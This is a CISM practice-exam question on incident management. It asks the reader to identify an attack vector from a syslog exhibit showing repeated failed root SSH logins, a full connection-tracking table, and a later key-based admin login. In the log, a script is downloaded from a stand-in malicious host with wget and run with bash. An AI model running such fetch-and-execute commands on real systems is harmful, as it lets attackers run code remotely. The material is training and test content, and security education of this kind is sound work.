CISM

Study mode — explanations shown

1

Incident Management

hard

Based on the exhibit, what is the MOST likely attack vector that led to the compromise?

Exhibit

Refer to the exhibit.

Exhibit: Syslog output from a compromised server:

Mar 15 10:23:45 server1 sshd[1234]: Failed password for root from 10.0.0.50 port 2222 ssh2
Mar 15 10:23:50 server1 sshd[1234]: Failed password for root from 10.0.0.50 port 2222 ssh2
... (repeated 100 times)
Mar 15 10:25:00 server1 kernel: nf_conntrack: table full, dropping packet.
Mar 15 10:25:02 server1 sshd[1235]: Accepted publickey for admin from 10.0.0.51 port 4444 ssh2
Mar 15 10:25:10 server1 bash: sudo: whoami
Mar 15 10:25:12 server1 bash: sudo: wget http://malicious.example.com/payload.sh
Mar 15 10:25:30 server1 bash: bash payload.sh
0 of 10 answered